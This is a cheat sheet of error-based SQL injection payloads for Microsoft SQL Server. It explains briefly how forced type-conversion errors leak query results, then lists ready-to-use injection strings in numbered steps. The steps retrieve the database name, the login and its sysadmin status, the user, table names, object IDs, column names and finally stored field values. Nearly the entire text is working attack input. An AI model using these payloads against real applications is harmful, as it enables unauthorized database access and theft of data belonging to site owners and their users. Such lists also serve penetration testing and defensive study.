[MS-SQL Error Based SQLi]
Every payload below makes SQL Server compare a string with the integer 1 (or 0). The implicit conversion fails with Msg 245, "Conversion failed when converting the nvarchar value '...' to data type int.", and the quoted value in that message is the string the injected subquery selected. This only works when the application returns database errors to the client.
0. Retrieve the database name
- ' and 1=(db_name())--
1. Retrieve the login account and its server-level privileges
- ' and 1=(select system_user as 'login name')--
- ' and 1=(select system_user)--
- ' and quotename(is_srvrolemember('sysadmin','sa'))=0--
- ' and quotename(is_srvrolemember(0x730079007300610064006D0069006E))=0--
(quotename() wraps the 1 or 0 in brackets, so the string '[1]' or '[0]' cannot be converted to int and is echoed in the error: [1] means true, [0] means false. The first form asks whether the login 'sa' is a sysadmin; the second passes N'sysadmin' as a UTF-16LE hex literal and checks the current login. is_srvrolemember() returns NULL, and therefore raises no error, when the role or login name does not exist.)
2. Retrieve the database user name
- ' and 1=(user)--
- ' and 1=(select user as 'user name')--
- ' and 0<>user--
(user is the database-level user, e.g. dbo, whereas system_user in section 1 is the server login)
3. Obtain table names
- ' and 1=(select name from (select row_number() over(order by name) as rowid, name from sysobjects where xtype=0x55)T where rowid=1)--
(enumerate by incrementing rowid; 0x55 is 'U', the xtype of user tables, and once rowid passes the last table the subquery returns NULL and no error is raised)
- ' and 1=(select top 1 name from sysobjects where xtype='u')--
- ' and 1=(select top 1 name from sysobjects where xtype=char(85))--
- ' and 1=(select top 1 name from sysobjects where xtype='u' and name not in('table_name'))--
(with the top 1 ... not in form every name found so far has to be appended to the list; the row_number() form only needs the counter)
4. Retrieve the object ID of a user table
- ' and 1=(select id from sysobjects where xtype='u' and name='table_name' and uid>(str(id)))--
(uid is a smallint, so the comparison converts str(id) to smallint; object IDs are normally far larger than 32767 and the resulting overflow error echoes the id, which the syscolumns payloads in section 5 need)
5. Obtain column names
- ' and 1=(select name from(select row_number() over(order by col.name) as rowid,col.name from sysobjects tab,syscolumns col where tab.id=col.id and tab.name='table_name')T where rowid=1)--
(enumerate by incrementing rowid; this form needs only the table name from section 3, not the id from section 4)
- ' and 1=(select top 1 name from syscolumns where id=table_id)--
- ' and 1=(select top 1 name from syscolumns where id=table_id and name not in('column_name'))--
6. Retrieve field values
- ' and 1=(select top 1 column_name from table_name)--
- ' and 1=(select top 1 column_name from table_name where column_name not in('first_value'))--
(only string columns leak this way; an integer column compares with 1 without any conversion error)